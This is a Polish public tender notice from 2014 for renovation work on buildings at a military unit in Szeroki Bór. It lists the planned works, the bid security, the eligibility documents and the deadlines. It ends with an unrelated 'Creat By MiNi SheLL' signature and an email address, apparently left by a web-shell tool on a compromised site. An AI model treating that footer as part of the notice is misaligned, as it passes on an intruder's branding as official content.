1.7.16.	 Tynki elewacyjne organiczne na bazie żywicy syntetycznej, wykonywane ręcznie - wykonanie warstwy pośredniej - lamperia korytarze	 - 63,488 	m2
1.7.17.	  Tynki elewacyjne organiczne na bazie żywicy syntetycznej z różnobarwnych kamieni o walorach tynku zmywalnego - Sto-Superlit o uziarnieniu 1,5 mm, wykonywane ręcznie - lamperia  -  63,488 m2 
1.7.18.	Dwukrotne malowanie farbą olejną rur wodociągowych i gazowych o śr. do 50 mm -  61,0 m
1.7.19.	Wykucie z muru i wstawienie nowych drzwi płytowych - ościeżnice stalowe  - 26,855 m2
1.7.20.	Montaż drzwi wewnętrznych PCV z obróbką obsadzenia - częściowo przeszklone, 2 szt. zamków typu GERDA plus samozamykacze.    - 	  2.08 	m2 
1.7.21.	Wykucie z muru ościeżnic drewnianych o pow. do 1 m2  - 1,00 szt
1.7.22.	Wykucie z muru podokiennika z lastryko - 0,90 mb
1.7.23.	Uzupełnienie ścian lub zamurowanie otworów na zaprawie cementowo - wapiennej bloczkami z betonu komórkowego - 0,365 m3
1.7.24.	Tynki wew. zwykłe kat III - 1,825 m2
1.7.25.	Analogia - obudowa rur wodnych płytami gips.- karton na rusztach metal. - 14,696 m2
1.7.26.	Analogia - obudowa rur  c.o. płytkami na rusztach metal. - 12,50 m2
1.7.27.	Demontaż baterii umywalkowej     -  6.00 szt.
1.7.28.	Demontaż pisuaru	- 1,00 kpl.
1.7.29.	Demontaż umywalki	 -   6.00 kpl.
1.7.30.	Demontaż ustępu z miską fajansową -  2,00 kpl.
1.7.31.	Demontaż rurociągu stalowego ocynkownego o śr. 15-20 mm  - 70,00 m
1.7.32.	Demontaż rurociągu stalowego  śr. 10 mm - 45,00 m
1.7.33.	Demontaż rurociągu stalowego  śr. 25 mm - 25,00 m
1.7.34.	Demontaż rurociągu stalowego  śr. 32 mm - 5,00 m
1.7.35.	Demontaż rurociągu żeliwnego kanalizacyjnego o śr. 50-100 mm - na ścianach budynku - 20.00 m
1.7.36.	Demontaż grzejnika żeliwnego - 7 kpl.
1.7.37.	Demontaż grzejnika stalowego płytowego  - 3,00 kpl
1.7.38.	Wpusty polietylenowe podłogowe o śr. zewn. 75-110 mm	- 1,00szt.
1.7.39.	Obsadzenie kratek wentylacyjnych w ścianach z cegieł - 16,00szt.
1.7.40.	Baterie umywalkowe ścienne o śr. nom. 15 mm - 8,00 szt.
1.7.41.	Rurociągi w instalacjach wodociągowych o śr. 15 mm stalowe ocynkowane   - 8,00 mb
1.7.42.	Montaż rurociągów z PCW o śr. 50 mm na ścianach z łączeniem metodą wciskową - 4,0	m
1.7.43.	Dodatkowe nakłady na wykonanie podejść dopływowych do zaworów wypływowych, baterii, hydrantów, mieszaczy itp. o śr. nominalnej 15 mm	 
- 	16.00 szt.
1.7.44.	Rurociągi z PCW o śr. 110 mm, wewnątrz budynków - z zaworem odpowietrzającym.  - 2,00 m
1.7.45.	Rurociągi z PCW o śr. 50 mm, wewnątrz budynków - z zaworem odpowietrzającym. - 1,00 m
1.7.46.	Montaż ustępów pojedynczych z płuczkami z tworzyw sztucznych lub porcelany kompakt-  2.00 kpl.
1.7.47.	Montaż umywalek pojedynczych porcelanowych z syfonem gruszkowym	 - 6.00 szt.
1.7.48.	Montaż  zlewozmywaka 	- 1.00 szt.
1.7.49.	Montaż  zlewu   - 1.00 szt.
1.7.50.	Dodatek za wykonanie podejść odpływowych z rur i kształtek z nieplastyfikowanego PCW o śr. 50 mm  -  11,00 szt.
1.7.51.	Montaż pisuarów pojedynczych z zaworem spłukującym	 - 1.00 kpl.
1.7.52.	Rurociągi w  instalacji c.o. stalowe o śr, 15 mm o połączeniach spawanych - 17,0 mb. 
1.7.53.	Rurociągi w  instalacji c.o. stalowe o śr, 20 mm o połączeniach spawanych  - 13,0 mb
1.7.54.	Rurociągi w  instalacji c.o. stalowe o śr, 25 mm o połączeniach spawanych - 48,0 mb
1.7.55.	Rury przyłączne o śr. 15 mm do grzejników  - 22 kpl.
1.7.56.	Grzejniki stalowe jednopłytowe  - 11 szt. 
1.7.57.	Zawory grzejnikowe termostatyczne o śr. nominalnej 15 mm -  11,00 szt.
1.7.58.	Wymiana przełącznika świecznikowego szeregowego, schodowego lub krzyżowego podtynkowego w puszce ( 9 szt. pojedynczy, 3 szt. podwójny, 1 przycisk dzwonkowy )  - 13.00 szt.
1.7.59.	Wymiana opraw świetlówkowych z blachy stalowej z kloszem z tworzyw szt. lub rastrem metalowym względnie z tworzyw szt. 2x40 W - szt. 12,00 szt.
1.7.60.	Wymiana opraw świetlówkowych z blachy stalowej z kloszem z tworzyw szt. lub rastrem metalowym względnie z tworzyw szt. 1x20 W -  10,00 szt. 
1.7.61.	Wymiana oprawek do żarówek zwykłych lub półhermetycznych porcelanowych lub metalowych do przykręcania na cegle lub gruzobetonie - plafoniery w łazience z kloszami - 	6,00 szt.
1.7.62.	Wymiana podtynkowych gniazd wtyczkowych do 16 A 2 bieg. ze stykiem uziemiającym - pojedyncze - 14 szt., podwójne - 8 szt.,  -  22.00 szt.
1.7.63.	Przewód YDY 5x6 układany w tynku do podłączenia przepływowego podgrzewacza wody - 25,00 mb
1.7.64.	Analogia - Wymiana przepływowego podgrzewacza wody 24 kW ( nowy podgrzewacz dostarcza wykonawca)  - 1 szt.
1.7.65.	 Analogia - przeniesienie szafki bezpiecznikowej ( uwzględnić koszt robocizny i materiału)  - 1szt.]

1.8.	Budynek nr 54 - lamperia korytarz
1.8.1	Tynki elewacyjne organiczne na bazie żywicy syntetycznej, wykonywane ręcznie - wykonanie warstwy pośredniej - lamperia - 181.952 m2
1.8.2	Tynki elewacyjne organiczne na bazie żywicy syntetycznej z różnobarwnych kamieni o walorach tynku zmywalnego - Sto-Superlit o uziarnieniu 1,5 mm, wykonywane ręcznie -  lamperia  - 	181.952 m2
1.9.	Transport
1.9.1.	Wywiezienie gruzu spryzmowanego samochodami skrzyniowymi na odl.do 1 km - 53,98m3 
1.9.2.	  Wywiezienie gruzu spryzmowanego samochodami skrzyniowymi - za każdy nast. 1 km -  539,80 m3
1.9.3.	Transport złomu samochodem skrzyniowym z załadunkiem i wyładunkiem ręcznym na odl. do 1 km  - 1,662 t
1.9.4.	Transport złomu samochodem skrzyniowym - dodatek za każdy rozpoczęty km ponad 1 km -  66,48 t

Utylizacja papy w ramach kosztów ogólnych budowy. Dokument potwierdzający z dokonanej utylizacji należy dołączyć do dokumentów w dniu odbioru robót ( o ile występuje).

2.  Warunki realizacji zadania:
2.1.	Zamawiający przewiduje możliwość dokonania wizji lokalnej miejsca inwestycji w terminie od 14.08.2014r. do 20.08.2014r. Wykonawca zobowiązany jest do wcześniejszego uzgodnienia terminu wizji lokalnej 
z Kierownikiem Sekcji Obsługi Infrastruktury Panem Jerzym GONTOWSKIM, tel. 87/4372220, bądź z z-cą Panem Janem SULŻYCKIM, tel. 87/4372221. Koszt takiej wizyty ponosi Wykonawca..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium zgodnie z art. 45 ustawy.
1.1.	Przystępując do postępowania każdy z Wykonawców zobowiązany jest do wniesienia wadium w wysokości 10 000,00 zł. (słownie: dziesięć tysięcy złotych).
1.2.	Wadium musi być wniesione przed upływem terminu składania ofert.
1.3.	Wadium może być wnoszone w jednej lub w kilku następujących formach: 
pieniądzu;
poręczeniach bankowych lub poręczeniach Spółdzielczej Kasy Oszczędnościowo-Kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
gwarancjach bankowych;
gwarancjach ubezpieczeniowych;
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.). 
Wadium wniesione w pieniądzu Wykonawca wpłaca na rachunek bankowy zamawiającego prowadzony przez: NBP O/O Olsztyn 51 1010 1397 0020 1713 9120 1000 z dopiskiem wadium w post. nr 83/2014 - roboty budowlane 
w budynku nr 55 na terenie JW. 4226 w Szerokim Borze
1.4.	Do oferty należy dołączyć kserokopię dowodu bankowego potwierdzającego wniesienie wadium w pieniądzu. W przypadku realizowania przez Wykonawcę rozliczeń bankowych w formie elektronicznej do oferty należy załączyć potwierdzenie wykonania operacji bankowej w formie kserokopii wydruku operacji. Zarówno kserokopia dowodu bankowego jak i dowodu pochodzącego z systemu elektronicznych rozliczeń - wymaga potwierdzenia przez Wykonawcę za zgodność z oryginałem
2.	Zwrot i zatrzymanie wadium. 
2.1.	Zamawiający zwraca niezwłocznie wadium, jeżeli:
- dokona wyboru oferty najkorzystniejszej, z wyjątkiem wykonawcy, którego oferta została wybrana, jako najkorzystniejsza, z zastrzeżeniem ust. 4a.
   - unieważni postępowanie o udzielenie zamówienia.
2.2.	Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
2.3.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz 
z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku banko-wego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
2.4.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca                          w odpowiedzi na wezwanie, o którym mowa w art. 26 ust 3 ustawy, nie złoży dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictwa, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
2.5	 Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
2.5.1	 odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2.5.2	 zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe, z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu posiadania uprawnień do wykonywania określonej działalności lub czynności, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu posiadania niezbędnej wiedzy i doświadczenia do wykonywania określonej działalności lub czynności, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu dysponowania niezbędnym potencjałem technicznym do wykonywania zamówienia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu dysponowania osobami zdolnymi do wykonywania zamówienia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej zrealizowanie zamówienia, jeżeli przedłoży informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których wykonawca posiada rachunek, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy o łącznej kwocie minimum 200 000,00 zł brutto.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>FORMULARZ OFERTOWY ­ wypełniony i podpisany wg wzoru Zamawiającego (załącznik nr 1 do SIWZ).
DOWÓD WNIESIENIA WADIUM
PEŁNOMOCNICTWO złożone w formie oryginału lub kopii poświadczonej notarialnie.
- W przypadku podpisywania oferty przez osoby nie wymienione w odpisie z właściwego rejestru - pełnomocnictwo do podpisania oferty lub podpisania oferty i zawarcia umowy
- W przypadku podmiotów występujących wspólnie pełnomocnictwo podpisane przez upoważnionych przedstawicieli każdego z podmiotów występujących wspólnie, do reprezentowania w postępowaniu (zgodnie z art. 23 ustawy Pzp)
W przypadku, gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia - pisemne 
(w oryginale) zobowiązanie podmiotów do oddania Wykonawcy 
do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.1	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy 
z zastrzeżeniem § 11 umowy.
2.2	Zamawiający dopuszcza  zmianę terminu zakończenia robót w przypadku:
wystąpienia robót dodatkowych, od których uzależnione jest wykonanie zamówienia podstawowego,
klęsk żywiołowych uniemożliwiających realizację przedmiotu zamówienia,
wstrzymania robót przez uprawnione organy, z przyczyn nie wynikających z winy Wykonawcy, 
2.3.	Zamawiający zastrzega możliwość zmiany wysokości zobowiązania określonego w § 5 ust. 1 umowy w przypadku zmiany stawki podatku od towarów i usług w 2014r.
2.4.	Wszelkie zmiany umowy mogą być dokonane jedynie za zgodą obu Stron w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.24wog.wp.mil.pl., http://www.bip.mon.gov.pl,<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa Nr 4352
ul. Nowowiejska 20
11-500 Giżycko
budynek sztabu - sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.08.2014 godzina 08:00, miejsce: Jednostka Wojskowa Nr 4352
ul. Nowowiejska 20
11-500 Giżycko
budynek sztabu - kancelaria jawna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com